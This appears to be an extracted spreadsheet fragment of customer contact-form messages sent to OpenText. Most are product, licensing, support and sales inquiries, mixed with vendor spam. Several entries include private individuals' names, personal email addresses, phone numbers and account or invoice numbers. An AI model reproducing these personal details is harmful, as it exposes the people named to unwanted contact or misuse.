    <t>We have version 10.6 of rightfax we are currently wondering what the latest version is and if that is supported on windows server 2012 R2</t>
  </si>
  <si>
    <t>Necesito saber si tienen oficinas en el país de México. De ser así favor de proporcionarme un número de teléfono.</t>
  </si>
  <si>
    <t>Hi there, I was hoping someone could help provide some information on the "Intangible Maintenance- LiquidOffice Enterprise Server Unlimited Users Production". Is this a maintenance contract? Does this include software updates? Could you provide a description of what is included?</t>
  </si>
  <si>
    <t>We need to upgrade our Brava from version 7.1 to whatever version is compatible to the newest version of D2. We currently have version 4.2 of  D2 and 7.1 of Brava. We are planning to upgrade our D2 as well to 4.5 or 4.7 and we need Brava to be compatible with those D2 versions. We are looking forward to your response. Thank you.</t>
  </si>
  <si>
    <t>Looking for a list of HP MFPs that are compatible with Rightfax 10.1 through 10.6</t>
  </si>
  <si>
    <t>I am the Training and Placement representative of National Institute of Technology, Jamshedpur - INDIA for Batch of 2018. I would like to invite Opentext on campus to conduct a hiring drives for Engineering/Technical roles in their Indian offices. _x000D_
Please share contact details of somebody who can look in to this. I can then send the formal invitation through mail._x000D_
_x000D_
Regards_x000D_
Vishal Khare_x000D_
+91-7319706481_x000D_
vishalkhare39@gmail.com</t>
  </si>
  <si>
    <t>We are working with a client that has TeleForms V 10.1. Could you please tell me what is the current version? Is there a document that would identify the changes in feature/functions since V 10.1 to the current version?</t>
  </si>
  <si>
    <t>Does your newest version of OpenText work on Windows 10?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I contact you as I need a quote for the following.  Please keep the ref number in your reply._x000D_
_x000D_
1x Opentext Webdav Client_x000D_
Ref : WO0000002597392 _x000D_
_x000D_
Cheers,</t>
  </si>
  <si>
    <t>Additional EasyLink service required.</t>
  </si>
  <si>
    <t>I am a senior Economics Major at Mercer University and currently an intern at Rotary Corporation. My project while at Rotary is to write a report for the first phase of finding a new business intelligence solution, of which BIRT is one of the solutions under consideration. In this stage I am doing preliminary research for a high level of information, of which I have written an RFP Questionnaire. This report is considering several BI solutions, and is being used to narrow down the solutions to 2 or 3 different solutions of which Rotary will consider using as their BI solution. I look forward to hearing back from your company regarding BIRT. Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">Hello I am interested in providing the following services to you and we also offer many more services, we are a one stop call for any services that you need, to make it easier for you to avoid dealing with multiple companies and save time and costs, we are know very well for our high quality work, low cost, fast completion times, and would like to become your preferred contractor._x000D_
_x000D_
Pops Equipment Services_x000D_
_x000D_
Landscaping_x000D_
Elevators_x000D_
Drywall/Plaster_x000D_
Fencing_x000D_
Electrical and Electrical Repairs_x000D_
Tree Removal and Replacement_x000D_
General Contractor_x000D_
Sprinklers/Irrigation_x000D_
Tile Installation_x000D_
Lino Installation_x000D_
Baseboard Installation_x000D_
Carpet Installation_x000D_
Pest Control_x000D_
Steam Cleaning_x000D_
Vent Cleaning_x000D_
Flood Clean Ups_x000D_
Paving and pavement repairs (potholes, crack sealing)_x000D_
Painting Interior/Exterior_x000D_
Swimming Pools_x000D_
Overhead Doors_x000D_
Tub Reglazing_x000D_
Counter Top Replacement_x000D_
Appliance Repair_x000D_
Fitness Equipment Repairs_x000D_
Concrete and concrete Repairs_x000D_
Sidewalk replacement or repairs_x000D_
Curb replacement or repairs_x000D_
Heating and Air Conditioning Installation/Repairs/Cleaning_x000D_
Eaves Trough Repairs_x000D_
Plumbing and Plumbing Repairs_x000D_
Roofing Repairs_x000D_
Cabinet Repairs/Replacement_x000D_
Siding Repairs/Replacements_x000D_
Lock Repairs/Replacements_x000D_
Sewer Repairs_x000D_
Door Repairs/Replacement_x000D_
Glass Repairs/Replacement_x000D_
Welding_x000D_
Mold Remediation_x000D_
Graffiti Removal_x000D_
Walk in Coolers_x000D_
Pressure washer cleaning of exterior of buildings_x000D_
New home and commercial building_x000D_
Property garbage clean up_x000D_
Garbage Removal_x000D_
Pavement and sidewalk sweeping_x000D_
General Cleaning_x000D_
Parking lot line painting_x000D_
Any interior/exterior repairs_x000D_
Snow removal from parking lots and sidewalks_x000D_
Automotive and heavy duty repairs_x000D_
Car sales_x000D_
Liquor sales_x000D_
_x000D_
Also basically anything else to do with construction or building maintenance etc._x000D_
_x000D_
Could you please send me the email and phone number of the appropriate person, also could they send me an email response to avoid repeated calls and emails, we will try to contact every 48 hours until a response is </t>
  </si>
  <si>
    <t>Issues uploading to DocWeb</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Could you please put me in email contact with your Marketing and Promotions Manager._x000D_
We have a rare brand partnering opportunity with RYAN GREGSON, one of Australia's most exciting athletes and Olympic 1500m finalist that we would like to discuss with you._x000D_
_x000D_
Regards _x000D_
Susan Gregson _x000D_
Marketing and Administration_x000D_
Little King Enterprises Pty Ltd_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I am looking to get a quote for a exceed license. </t>
  </si>
  <si>
    <t>Buen día;_x000D_
_x000D_
Podrían orientarme, necesito ponerme en contacto con un partner para latinoamérica para implementación de Opentext, que no sea la empresa Projection Core, gracias de antemano.</t>
  </si>
  <si>
    <t>I'm having issues with PDF file naming versus PDF file content. Using Dialogue version 8.0.302</t>
  </si>
  <si>
    <t>Hi ! _x000D_
I just created an account and can't see your community forums anymore. I get this error : "Sorry, you don't have permission for that!"_x000D_
And I cant contact any administrator from there. _x000D_
_x000D_
Thank you for you feedback. _x000D_
_x000D_
Antoine</t>
  </si>
  <si>
    <t>Need Help with account</t>
  </si>
  <si>
    <t>We have Infor M3 and I need to get access into the support site.</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
_x000D_
Ewebcontent is a team of creative and business writers based in Mumbai (India). We deliver a lot more than conventional 'copywriting'; we call it 'Content Process Outsourcing'._x000D_
_x000D_
 _x000D_
 _x000D_
WHAT WE OFFER : _x000D_
 _x000D_
400 word article price - $12_x000D_
_x000D_
Payment method : Paypal_x000D_
 _x000D_
 _x000D_
Get custom content with our writing service._x000D_
 _x000D_
We know that the right words can enhance and re-define your brand, business, and content. The power of a well-written sentence (or two) can mean the difference of a client. _x000D_
 _x000D_
 _x000D_
Engaging Content_x000D_
 _x000D_
The best SEO articles not only must attract search engines, they must also keep readers engaged. _x000D_
 _x000D_
As search engines start emphasizing the user experience, sticky content and how often an article is shared are more important in terms of SEO._x000D_
 _x000D_
 _x000D_
Unique Content_x000D_
 _x000D_
All content submitted through our system goes through an extensive editorial review which includes plagiarism detection from Copyscape_x000D_
 _x000D_
 _x000D_
Our team of SEO writers writes for both human eyes and search engine bots, resulting in SEO articles that please both. Increase stickiness and encourage sharing by taking advantage of Ewebcontent's SEO content service._x000D_
 _x000D_
 _x000D_
5 years of experience, more than 40000 articles and we are just getting started. Join the experts and let us get you to the top!_x000D_
_x000D_
Kind Regards,_x000D_
Rahul Rathi_x000D_
www.ewebcontent.com_x000D_
info@ewebcontent.com</t>
  </si>
  <si>
    <t>Does Brava redlining support SharePoint Online?</t>
  </si>
  <si>
    <t>Just to let you know that I think we have a resolution to the issue raised in my last contact submission regarding archived Alchemy data. Many thanks. Andy Cole</t>
  </si>
  <si>
    <t>I cannot see our active Exceed licenses in Finnair Oyj account. _x000D_
Serial no ref S-EXMPI550101M_x000D_
Invoice ref: SCH08119565</t>
  </si>
  <si>
    <t>Hello, I was wondering if you have taken emc's eRoom tool on board with your recent acquisition, and wheter there is plans to either stil support it or even further develop this useful functionality._x000D_
Thank you,_x000D_
Jens</t>
  </si>
  <si>
    <t>After the Grenfell Tower Block fire disaster in London we have a need to access archived files regarding building cladding from an Alchemy system (pre 2005). Is there an alchemy viewer available that we can download or are the files be viewable in any other way?_x000D_
_x000D_
I'm sure you recognise the importance of this issue so any help appreciated._x000D_
regards_x000D_
_x000D_
Andy Cole</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir sind eine große SharePoint Agentur aus Paderborn sowie weiteren Niederlassungen in Köln, Hamburg und Würzburg. Da wir eine Vielzahl an SharePoint Kunden haben, die am SharePoint Document Connector interessiert sind, möchten wir Kontakt zu Ihnen aufnehmen und über eine Partner Kooperation sprechen. Bisher fehlt uns noch das technische Know How um den Connector zu implementieren. _x000D_
Kurze Info zu uns: Wir sind Microsoft Gold Partner im SharePoint Bereich und betreuten Kunden im gehobenen Mittelstand sowie Konzernumfeld. Unser SharePoint Team besteht aus ca. 40 Vollzeitkräften. Damit sind wir einer der größten SharePoint Agenturen in Deutschland. Wir sind immer auf der Suche nach starken Herstellern, mit denen wir gemeinsam weitere Kunden gewinnen können. Für mehr Infos besuchen sie gerne unsere Website www.axongmbh.de _x000D_
Ich freue mich von Ihnen zu hören_x000D_
Viele Grüße_x000D_
Madina Nazary</t>
  </si>
  <si>
    <t>Inhouse Workshop für Streamserve 5.6.2 Administration</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
I am Laxmikant Thipse, Founder of GameCloud Technologies Pvt Ltd. We are a group of professional QA testers, having experience of over 1000 Games and Apps on all major platforms. I would like to share our portfolio with opentext team, if you are interested._x000D_
 _x000D_
We are happy to provide you bug reports based on a quick quality audit for your Game/App at no cost. If you find value in our submission, you can try our most competitively priced premium services in the future :)_x000D_
 _x000D_
Looking forward to your response._x000D_
_x000D_
Best Wishes,_x000D_
_x000D_
Laxmikant Thipse</t>
  </si>
  <si>
    <t xml:space="preserve">We are exploring new document authoring and approval tools for standards committees with multiple stakeholders from multiple organisations. </t>
  </si>
  <si>
    <t>We use OpenText for vendor invoice management, scanning and archiving in SAP, this is licensed under our SAP contract (US based). We're investigating to use ECM also to enable access to documents from outside SAP also. Can you provide me info on the license options and cost for this?</t>
  </si>
  <si>
    <t>I received a letter dated 6 June 2017 from you with the reference US01-105478 advising we owe an amount of $360.24.  The letter was sent by Nikki Neri there is no email address for her.  Please can you get them to email me the invoice so that we can actually see what this is all about please. michael@krites.com</t>
  </si>
  <si>
    <t>to know the contract between CCA and opentext</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for fax to email / email to fax solution._x000D_
Previously Stratos had engaged opentext via optus few years ago, but the project was abandoned._x000D_
_x000D_
Now we would like to engage with opentext directly for the solution, as we are looking at relocating our office._x000D_
Can you please send us some indicative pricing for fax solution please?_x000D_
_x000D_
Also, is there a way to perform a trial ?_x000D_
</t>
  </si>
  <si>
    <t>Big Brother Big Sister Sponsorship Opportunities!</t>
  </si>
  <si>
    <t>I need our account to be profiled with Macy's. No clue how to do that.</t>
  </si>
  <si>
    <t>Asking to change password but can't remember old password</t>
  </si>
  <si>
    <t>I'm interested in learning more about your notification solutions. We send daily notifications to clients and travel partners and are looking to optimize our message delivery and reporting.</t>
  </si>
  <si>
    <t xml:space="preserve">I have relocated from the Oroville BP station in Spokane Sector to the Sumas BP station in Blaine Sector.  I need to update my supervisor.  I need to release agents assigned to me for PWPs.  I need to have new agents assigned to me for PWPs. .  </t>
  </si>
  <si>
    <t>I need to have my account taken off hold.  The account# is 853680.  The fax #8669135058.  I believe it may need a credit card update.  Please let me know.  Debra Chase</t>
  </si>
  <si>
    <t>Contact center conference/ GoPro entry</t>
  </si>
  <si>
    <t>Office365 capabilities for on-premise Right Fax appliance and Cloud Fax considerations with Office365.</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of building a system that requires notification capabilities. I came across your solution and am interested in understanding further._x000D_
_x000D_
Can we arrange for a discussion, and a demo if possible._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Previously used ApplicationXtender Document Manager. We are looking for an upgrade but similar system to house our Employee Personnel Files so we can move from paper to paperless. </t>
  </si>
  <si>
    <t>Captiva purchase and implementation with integration to Oracle EBS Financials.</t>
  </si>
  <si>
    <t>Looking for an ApplicationXtender 8.1 Document Manager User Guide</t>
  </si>
  <si>
    <t>daa</t>
  </si>
  <si>
    <t xml:space="preserve">Pouvez vous m'envoyer une documentation décrivant les fonctionnalités offertes d'un point de vue RH ? Merci ! </t>
  </si>
  <si>
    <t>I am looking for a quote for Documentum eTMF</t>
  </si>
  <si>
    <t>We are investigating options for a different fax system.  We currently use RingCentral but this system does not readily date/time of receipt stamp faxes received and this is becoming a cumbersome process to capture this information for regulatory requirements.</t>
  </si>
  <si>
    <t>I worked with Gretchen a few years ago to set up some instructor-led training classes (I signed up for 2 that were nearly 5k if I remember correctly) that I was charged for. The training sessions were canceled in lieu of moving to a computer based learning yet the training was never refunded. Rather, she said I could take the computer based training at some point in the future. It's been awhile now but could you please let her know I would like to take those trainings sometime in the near future? I would greatly appreciate it.</t>
  </si>
  <si>
    <t>Migration to OncoEMR software</t>
  </si>
  <si>
    <t>We are experiencing issues with faxes being cut off, and/or text being jumbled together when vendors receive them.  They look flawless in RightFax, but once they are received by the vendor the documents are missing information.  The cutting is always happening from right to left, and sometimes the pages are cut only about 10%, and other times up to about 90%.  Text looks squished together as well.  This is happening to multiple different vendors so we are positive it is on our end.  Please advise, and thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are in search of a document management system for our new greenfield site to utilize post project and operations. </t>
  </si>
  <si>
    <t>Termination of Services</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to discuss with you about OpenText Blazon. We will like to use it as part of our existing DMS application, for conversion purposes._x000D_
_x000D_
Kind regards.</t>
  </si>
  <si>
    <t>We are interested in purchasing tools for data discovery and classification for GDPR compliance assessments.</t>
  </si>
  <si>
    <t>We need a licence of "Open Text Enterprise Connect". Can you tell us where to buy?</t>
  </si>
  <si>
    <t>HI , I am trying to send a fax to '14047731945@faxmail.com' but the service is denied, and your system sends a respective failure message. Kindly contact me._x000D_
Olaf</t>
  </si>
  <si>
    <t>I am looking at the possibility of setting up Tempo box for the company. We already use it as a third party._x000D_
Regards_x000D_
John</t>
  </si>
  <si>
    <t>Madame, Monsieur,_x000D_
_x000D_
Depuis 9 ans, l'entreprise ELLIPSE EXPO met à la disposition de ses clients son savoir-faire et leur offre une garantie de résultats._x000D_
_x000D_
Expérimentée, notre équipe se met à votre service pour assumer l'ensemble des tâches inhérentes à la création de stands :_x000D_
_x000D_
- étude de projet,_x000D_
_x000D_
- conception graphique en 3D_x000D_
_x000D_
- fabrication dans notre atelier de menuiserie,_x000D_
_x000D_
- prémontage,_x000D_
_x000D_
- transport,_x000D_
_x000D_
- installation en France et en Europe._x000D_
_x000D_
Vous garantir des prestations de qualité, créer des stands sur mesure avec esthétisme et dans le respect des délais fixés, optimiser votre force commerciale durant votre exposition, tels sont nos engagements._x000D_
_x000D_
Nous sommes donc amenés, par le présent mail, à vous proposer nos services concernant le prochain salon Supply Chain Event à Paris, sans engagement de votre part._x000D_
_x000D_
Envoyez-nous votre dossier de consultation par retour d'email._x000D_
_x000D_
Dans cette attente, nous sommes à votre disposition pour répondre à toutes vos questions._x000D_
_x000D_
Bien cordialement._x000D_
_x000D_
_x000D_
Gilles BOUVRY_x000D_
_x000D_
_x000D_
ELLIPSE EXPO_x000D_
_x000D_
41 avenue Jean Monnet_x000D_
13410 LAMBESC_x000D_
_x000D_
_x000D_
06.18.70.15.81_x000D_
_x000D_
ellipse.expo.gillesbouvry@gmail.com_x000D_
http://www.facebook.com/ellipseexpo</t>
  </si>
  <si>
    <t xml:space="preserve">Need Support to liaise with installation engineer (Theo Van Kann)_x000D_
We are struggling to get the (HP) Exstream Design Manager software to accept License key whilst trying to get the software installed/configured to be delivered as Windows RDS clients_x000D_
_x000D_
_x000D_
Could you please contact Theo directly &amp; liaise with him to help resolve our issue --- see eMail below_x000D_
*******************************************************************_x000D_
Hi Stefan, _x000D_
We still don’t have a valid license key for HP Exstream, can you help us with this?_x000D_
_x000D_
Met vriendelijke groet / Mit freundlichem Gruß / Kind regards  / Meilleures salutations_x000D_
 _x000D_
Theo Van Kann_x000D_
Expertise Center_x000D_
Technology Transformation Services_x000D_
M: +31 6 53 72 22 75_x000D_
theo.vankann@atos.net_x000D_
***********************************************************************_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I work in "OpenText Case 360" for many years as OpenText employee and now as self contractor. _x000D_
_x000D_
Nowaday, I work for INAMI, a belgium public health insurance branch. My client "INAMI" has a customer support account and can not add me in because of I'm not an employee of INAMI. _x000D_
_x000D_
As is, I cannot access to any documentation neither resources to be kept update with Case 360._x000D_
_x000D_
In my situation, can you help please ?_x000D_
_x000D_
Regards,_x000D_
David Doan_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interesse an der Lösung für "Regulated Documents"._x000D_
Kontaktaufnahme bitte per Mail.</t>
  </si>
  <si>
    <t>Absence sharpens love, presence strengthens it. ---Proverb</t>
  </si>
  <si>
    <t>I need to create an UPC catalog of our products and an EDI provider for the Nordstrom drop ship program. Your representative from Singapore contacted me and asked me information but didn't provide any help on my request. And our company is registered in Canada. So please assign a representative from Canada to call me. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day, Am David McCarthy . i wanna know if you can handle website design for a new company and also if you do you accept credit cards ?? kindly get back to me ASAP so i can send you the job details... _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">INTERESTED IN SHARING A RFP </t>
  </si>
  <si>
    <t>Is there an issue getting into the Catalog at this time,   I try to sign on,  and no error,  but not letting me in.   I've tried two different catalogs,  with the same no response</t>
  </si>
  <si>
    <t>Contract Management System</t>
  </si>
  <si>
    <t>Having terrible time with cut and paste between Exceed, VPN and other Window's tools.  Seems to have gotten worse with new 11.5 that were are qualifying now.</t>
  </si>
  <si>
    <t>I need to know if Metastorm BPM is compatible with Windows 10.</t>
  </si>
  <si>
    <t>We have a number being blocked and it needs to be checked out.</t>
  </si>
  <si>
    <t>sync documents between eDocs DM and Citrix Sharefile.</t>
  </si>
  <si>
    <t>Discuss possible partnership with RightFax so that Sunquest can develop software that integrates with RightFax for our mutual clients.</t>
  </si>
  <si>
    <t>Would like to schedule a Decisiv 8.0 demo.</t>
  </si>
  <si>
    <t>Need access to all support features including licenses/access keys.</t>
  </si>
  <si>
    <t>Interest in Brava Viewer for SharePoint.  We are a SharePoint consulting group and we have a client interested in this product.   We'd like to see a demo.</t>
  </si>
  <si>
    <t>WOuld like to know more on Archive server technical details for compatibility. Please contact me. Thanks</t>
  </si>
  <si>
    <t>Our department would like to schedule a demonstration of how OpenText works to allow us to better manage our content. We would like to schedule the demo for sometime this week. June 28 - June 30.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I notice that the free download trial of brava reader is not compatible with our current Windows 7 operating system (when we install it, we get an error message that states we need to upgrade to Windows 10)_x000D_
Please could you confirm that the full version is compatible with Windows 7_x000D_
Thanks_x000D_
Regards_x000D_
Paul</t>
  </si>
  <si>
    <t>We are evaluating ECM software for our enterprise.  I have some questions about your products.</t>
  </si>
  <si>
    <t xml:space="preserve">Content Management software </t>
  </si>
  <si>
    <t>Looking for an alternative to SharePoint that is easier to administer and is able to connect to our accounting software, Deltek Costpoint.</t>
  </si>
  <si>
    <t>Hello: I contact you because it has been impossible to contact anybody from recommind, and I am looking for a product that they (now you) offer: Perceptiv Contract Analysis. I would like to implement a digitalization of the ISDA agreement, for which I am looking for the best solution in the market. The goal is to have a digital version of the contract that can be read by a machine, and we can manage those contracts (kind of analytics). I have at the moment about 60 ISDA/CSA contracts, and I may be negotiating an additional monthly contract._x000D_
_x000D_
I would like to know if you have experience working with ISDA/CSA documents and if you have an overview of this use case for my review. It would be very interesting if you are able to process an agreement like the ISDA/CSA but in Spanish language(I have more than one thousand, so there is much work on there), those contracts have a structure very similar to ISDA but under local law and in Spanish._x000D_
_x000D_
Please let me know if this is acceptable to you, and then I can write you with more details for your evaluation._x000D_
_x000D_
Best,</t>
  </si>
  <si>
    <t xml:space="preserve">We have received an invoice from you but seem to have misplaced it. Could you please send me another copy. Invoice number: SUK08160384_x000D_
Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Update of BRAVA DWG Viewer </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am writing to you on behalf of the Kidney Foundation of Canada to see if Open Text Corp. would be interested in sponsorship for the KW Kidney Walk that is set to take place on Sunday, September 24th, 2017. The goal for this event is to bring awareness to Kidney Disease as well as to provide emotional and financial support for those living with the disease. We would love to see you get involved!_x000D_
_x000D_
If you are interested, I can send you a Sponsorship package that has more details about the event as well as what it means to be sponsor. Thank you for your consideration, and I look forward to hearing from you!_x000D_
_x000D_
Sincerely,_x000D_
Amanda Andreotte</t>
  </si>
  <si>
    <t>I am currently consulting with a customer and we are building a technology master plan.  My customer is an Engineer To Order manufacturer and we identified content management as a potential key building block for it IT architecture._x000D_
We are now in the discovery phase and the customer will completely renew its whole IT environment over the next 2-3 years.  Its a $500MM revenue company with Mfg locations in Southeast US, Western Canada and Quebec._x000D_
Would you be able to present in French and English the capabilities of OT and the benefits it can bring to an ETO manufacturer?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
we need information at our ID for SAND Profile at GXS._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
This is Eugenia Andreeva from Sirotina Personnel and I am writing to you regarding an excellent opportunity to work with our IT recruitment company. We show what we can do to help you along the way. Email me and I'll send the commercial proposal._x000D_
We’re looking for hearing from you soon._x000D_
Kind regards,_x000D_
Eugenia Andreeva_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am a Buyer at Cambridge Assessment, we are a non-teaching department of the University of Cambridge. We have 3 examination boards that sit within the Cambridge Assessment group; OCR, Cambridge International Examinations and Cambridge English Assessment, as well as a number of departments that sit in our Corporate Services Division._x000D_
_x000D_
Our Finance department are looking to replace the current Invoice Scanning &amp; Accounts Payable system with a new SAP-Certified Document Management solution and are interested in learning more about what your solution can offer. _x000D_
_x000D_
It would be great if you could get in contact to discuss this opportunity further._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Many thanks, _x000D_
Rachel</t>
  </si>
  <si>
    <t>I need to know whether sentimental analysis tool canbe inntegrated into  ASP.Net</t>
  </si>
  <si>
    <t>Issue with EMC IRM PDF plugin. While opening Acrobat Reader DC 2017.009.20044 error message is displayed about incorrect version of plugin. The newest version on your website is the one for Acrobat DC 2015 which is the older version._x000D_
Thank you for your support.</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have an office in Kenya. I wish to discuss a few IT ideas with one of your members that can be explored in the Kenyan Market. I have three ideas but at the moment I don't have the capacity to commercialize them. Who should I address this issue with?_x000D_
Regards and Thank you in advance. </t>
  </si>
  <si>
    <t xml:space="preserve">Nuffield Health has a requirement to introduce a new document management system that can enable scanning, storing and searching of paper-based artefacts across Nuffield sites. We are at an early stage of requirements gathering and are keen to engage with you to explore solutions in this space. </t>
  </si>
  <si>
    <t>Need to setup fax printing from our SAP systems to your opentext304 fax gw/modem we currently use to print adobe forms (now sapforms)</t>
  </si>
  <si>
    <t>Corporate Meditation for Stress Relief_x000D_
 _x000D_
by Spiritual Masters Famous in 133 Countries_x000D_
 We are pleased to inform you that Gurumaa Rokmani Ji is now available for Stress Relief Meditation Sessions and Workshops for Corporates to boost the performance and work efficiency of your highly skilled professionals and other employees through effective stress reducing techniques._x000D_
 _x000D_
Stress Relief Meditation is scientifically proven to increase concentration, focus, happiness and well being in people at work. That is why all the leading companies including Apple, Google, Facebook, Microsoft, Yahoo, Nike, Proctor &amp; Gamble, HBO, McKinsey &amp; Co, and Many Banks are adopting meditation techniques for their employees to reduce their stress at work and in personal life._x000D_
 _x000D_
About Gurumaa Rokmani_x000D_
 _x000D_
Gurumaa Rokmani Ji  is an Enlightened Master &amp; a Yogi from the age of 14 after being Initiated by Guru Rajneesh Rishi Ji (Famous Spiritual Guru, Spiritual Author &amp; Astrologer famous in 133 Countries). She is teaching all around the World to Professionals, Students, Doctors and Businessman etc. from last many years. Guru Maa Rokmani Ji Having an inspiring personality is Transforming People all around the world through her Innovative - Powerful Meditational Techniques and Practical-Applicable Teachings. She is author of spiritual books and has been telecasted in more than 300 TV shows too._x000D_
 _x000D_
To learn from Guru Maa Rokmani Ji will be a great opportunity for all your employees to cope up with Stress, to boost their enthusiasm, to Increase Work Efficiency, to Rejuvenate and Optimize all aspects of their Mental &amp; physical Health which will lead to overall Success of your Company._x000D_
 _x000D_
Now We are herewith pleased to announce that You can book Meditation Sessions / Workshops of Gurumaa Rokmani Ji for your Company &amp; workers on Monthly / Annual Contract on first come first serve basis._x000D_
 _x000D_
Book Corporate Meditation in Delhi &amp; NCR_x000D_
Call - +91- 8860 329 330 / 011- 45051710_x000D_
Email - info@Shanidev.U</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I am Nanditha and am a part of the L&amp; D Team at CGI, Bangalore, India._x000D_
I write this mail with regards to the “Open Text Archive Server Training” training that we intend to roll out for one of our project teams on a very critical basis.                                                                                               _x000D_
Currently just want to get details about the cost involved for this training and whether the trainings are conducted by Open Text in Bangalore for 1-2 participants._x000D_
Content:_x000D_
Archive Server Administration_x000D_
http://www.opentext.com/training/coursedetails.html?id=1324_x000D_
_x000D_
Archive Center Installation and Administration v16(Latest version of archive server)_x000D_
http://www.opentext.com/training/coursedetails.html?id=2322 _x000D_
 		                    _x000D_
Kindly share the below requested details so that we can look at planning the same at the earliest:_x000D_
_x000D_
1.	Course Duration_x000D_
2.	Training content_x000D_
3.	Availability in July 2017 at BLR_x000D_
4.	Commercials _x000D_
_x000D_
Will be great if you could share the requested details on priority.            _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To query and purchase the Centura Report Builder for the report templates in our systems. </t>
  </si>
  <si>
    <t>Hi Sir, _x000D_
From your website, we found you are distributing  thin client products._x000D_
 Would you be interested in carrying a new brand or  OEM manufacturing your own brand?_x000D_
We have over 10 years of experience in doing OEM orders for domestic and overseas clients. _x000D_
Our main OEM client are Centerm, Great wall, Dell ChipPC, VXL  most of them are worldwide big brands.  _x000D_
Hope we can cooperate with you .</t>
  </si>
  <si>
    <t>Company has old version of Captaris Alchemy. Need to upgrade the software and Search license to the latest version.</t>
  </si>
  <si>
    <t>Enterprise Records Management Solution - Onsite Demonstration Request. Email is the best way to contact me.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated Database from  Financial and Accounting industry._x000D_
_x000D_
We have the complete contact details of VP’s, Financial analysts, Financial advisor, Administrator, Controller, Pension planers, Treasurer and controller - finances, Risk Management, Accountant, Billing Analyst, Budget Analyst, Supervisor, Credit Analyst, Economist, Finance Director, Finance Manager, Debt Manager, Budget Planer, Risk Management( Coordinator, Director, Specialist, Supervisor, Manager).        _x000D_
_x000D_
Industries and sectors : Commercial Banks, Electronic banking &amp; technology suppliers, Money transfer services, Insurance companies,Treasury Management, Pension funds, Micro-finance institutions, CIP / Economic Development, Securities Brokerage, Investment Management, Regulatory Agencies and Securities Exchanges, Public Accounting Firms, Forex- bureaus, Finance &amp; Investment consultants, Leasing companies, Money Lenders and many more._x000D_
_x000D_
Kindly revert back with your requirements such as sectors, job functions you are looking for and we will run few samples for you._x000D_
_x000D_
Best Regards,_x000D_
Lee Johnson_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>I need to update a contact for an existing Easylink fax to mail phone number email on my existing account (Acct. # 68722).</t>
  </si>
  <si>
    <t>Interest in DMS/Email</t>
  </si>
  <si>
    <t>I need pricing and system requirements for Open Text. Small office, 3 users. Email preferred method of contact</t>
  </si>
  <si>
    <t xml:space="preserve">Looking at replacing our current middleware._x000D_
We would be interested in an house offer. Software on our location._x000D_
And cloud/hosted offer. Software/hardware not on our location._x000D_
We are looking for some ballpark numbers as soon as possible. _x000D_
_x000D_
Docs per day approx. 100k_x000D_
Docs per week approx. 500k_x000D_
Docs per year approx. 30m_x000D_
_x000D_
Currently 240+ integration flow pieces._x000D_
_x000D_
Current traded EDI doc types:  9_x000D_
810, 811, 820,832,850,852,864,984,997_x000D_
_x000D_
Current traded non EDI doc types: _x000D_
XML, flat file, delimited, possible others._x000D_
_x000D_
Current trading partners: approx. 384 EDI _x000D_
_x000D_
Current internal business Partners: TDB_x000D_
_x000D_
_x000D_
Communications protocols: FTP, SFTP, AS2_x000D_
Approx. 13 AS2 partners._x000D_
_x000D_
Regards,_x000D_
John Sipes | EDI Coordinator | Speedway LLC_x000D_
500 Speedway Drive, Enon, OH 45323_x000D_
Phone: 937-863-4066 | Email: JSipes@Speedway.com_x000D_
</t>
  </si>
  <si>
    <t>User had Rightfax on old PC and needs it on their new PC.</t>
  </si>
  <si>
    <t>I am involved with a bid that requires me to integrate Sharp copiers with RIGHTFAX. The customer has RIGHTFAX presently with another brand machine. What is required of me to have Sharp machines work with RIGHTFAX. Please advise. Thank you, John Ney Owner - Lake Area Office Products.</t>
  </si>
  <si>
    <t>I work in the Continuing Education department for an insurance education company, mostly filing for and processing course approvals from all 50 states. We would like to look into form reading technology to assist us in capturing this information and entering it to our database. This would include information such as the state, course title, course number, effective date, expiration date, number of credit hours, and type of credit hour. Each state's approvals come in slightly different formats, so the recognition software would need to be able to identify this type of information on a wide variety of different layouts and formats, ranging from Word and PDF documents, web pages (i.e. Sircon), emails, and paper mail. Would your document recognition software be able to assist us in this effort? Please let me know.</t>
  </si>
  <si>
    <t>We are looking for a new contracts management system and hummingbird was brought up... Is this something that OpenText now owns? We would be interested in seeing a demo. Thanks!</t>
  </si>
  <si>
    <t>I have bought Brava Desktop twice.  Last time it just stopped working so I have been using Brava Reader.  I notice you are now Canadian.  Are the prices Canadian?_x000D_
The licence system seems to be a problem._x000D_
Cam</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated Database from all the industries. _x000D_
_x000D_
We have the complete contact details and verified email addresses of Senior-level VPs and directors, President, CIOs/CEOs/CTOs, Managers, Retailers, Manufacturers and other key decision makers from industries mentioned below, who might be interested in your product/services._x000D_
_x000D_
